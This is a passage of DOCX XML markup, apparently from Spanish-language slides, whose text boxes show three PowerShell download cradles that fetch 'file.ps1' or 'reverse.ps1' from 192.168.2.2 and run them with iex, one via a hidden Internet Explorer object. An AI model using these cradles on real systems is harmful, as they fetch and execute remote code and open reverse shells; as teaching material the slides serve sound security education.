                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="6227A713" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26417C77" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39509EAC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64E40439" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A82F373" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487681536" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6644E421" wp14:editId="7BF0A7EB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2191511</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>183030</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8004175" cy="1477010"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4175" cy="1477010"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="53AE6C3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="202" w:line="376" w:lineRule="auto"/>
                              <w:ind w:left="325" w:right="205"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>$file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET'</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId222">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial"/>
                                  <w:color w:val="2E5496"/>
                                  <w:spacing w:val="-8"/>
                                  <w:sz w:val="36"/>
                                </w:rPr>
                                <w:t>,'http://192.168.2.2/file.ps1',$false);$file.sen</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-8"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                                <w:w w:val="105"/>
                                <w:sz w:val="36"/>
                              </w:rPr>
                              <w:t>d(); iex $file.responseText</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="6644E421" id="Textbox 475" o:spid="_x0000_s1243" type="#_x0000_t202" style="position:absolute;margin-left:172.55pt;margin-top:14.4pt;width:630.25pt;height:116.3pt;z-index:-15634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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="53AE6C3F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="202" w:line="376" w:lineRule="auto"/>
                        <w:ind w:left="325" w:right="205"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>$file=New-Object -ComObject Msxml2.XMLHTTP;$file.open('GET'</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId223">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial"/>
                            <w:color w:val="2E5496"/>
                            <w:spacing w:val="-8"/>
                            <w:sz w:val="36"/>
                          </w:rPr>
                          <w:t>,'http://192.168.2.2/file.ps1',$false);$file.sen</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-8"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-2"/>
                          <w:w w:val="105"/>
                          <w:sz w:val="36"/>
                        </w:rPr>
                        <w:t>d(); iex $file.responseText</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC2361B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="440" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31A26D8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F514F21" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="1631"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A66CBB8" wp14:editId="34A23AAB">
                <wp:extent cx="9225280" cy="809625"/>
                <wp:effectExtent l="9525" t="0" r="4445" b="9525"/>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5280" cy="809625"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="4DDE2B66" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="393"/>
                              <w:ind w:left="246"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>iex</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> (New-Object </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>Net.WebClient</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t xml:space="preserve">). </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>DownloadString</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>('https://192.168.2.2/reverse.ps1')</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="5A66CBB8" id="Textbox 476" o:spid="_x0000_s1244" type="#_x0000_t202" style="width:726.4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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="4DDE2B66" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="393"/>
                        <w:ind w:left="246"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>iex</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> (New-Object </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>Net.WebClient</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t xml:space="preserve">). </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>DownloadString</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>('https://192.168.2.2/reverse.ps1')</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D557277" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42151207" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D61655E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C7AA448" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FD55E4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CD4EFB4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FFCD177" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70FC8C7B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A64B1D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9C57E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E4ED85" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="64"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487682560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4EB19061" wp14:editId="0CFCC66A">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>605027</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>215989</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="10629900" cy="1835150"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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0" cy="1835150"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6020BA2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="117"/>
                              <w:rPr>
                                <w:b/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="62930DDD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="1" w:line="376" w:lineRule="auto"/>
                              <w:ind w:left="248" w:right="273"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t>$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId224">
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                  <w:color w:val="2E5496"/>
                                  <w:spacing w:val="-4"/>
                                  <w:sz w:val="40"/>
                                </w:rPr>
                                <w:t>http://192.168.2.2/reverse.ps1</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-34"/>
                                <w:sz w:val="40"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> '); sleep 5;$response=$ie. Documento.cuerpo.innerHTML;$ie.quit(); IEX $response</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="4EB19061" id="Textbox 477" o:spid="_x0000_s1245" type="#_x0000_t202" style="position:absolute;margin-left:47.65pt;margin-top:17pt;width:837pt;height:144.5pt;z-index:-1563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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6020BA2C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="001B199E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="117"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="62930DDD" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="1" w:line="376" w:lineRule="auto"/>
                        <w:ind w:left="248" w:right="273"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t>$ie=New-Object -ComObject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId225">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                            <w:color w:val="2E5496"/>
                            <w:spacing w:val="-4"/>
                            <w:sz w:val="40"/>
                          </w:rPr>
                          <w:t>http://192.168.2.2/reverse.ps1</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-34"/>
                          <w:sz w:val="40"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> '); sleep 5;$response=$ie. Documento.cuerpo.innerHTML;$ie.quit(); IEX $response</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3678CE6D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1220" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5393ED89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15823872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="58547692" wp14:editId="3B55A35E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1304925"/>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304925"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1304925"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="479" name="Graphic 479"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1304925">
                                <a:moveTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1304544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1304544"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="480" name="Textbox 480"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1304925"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="775DC1E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="389"/>
                                <w:ind w:left="2749"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
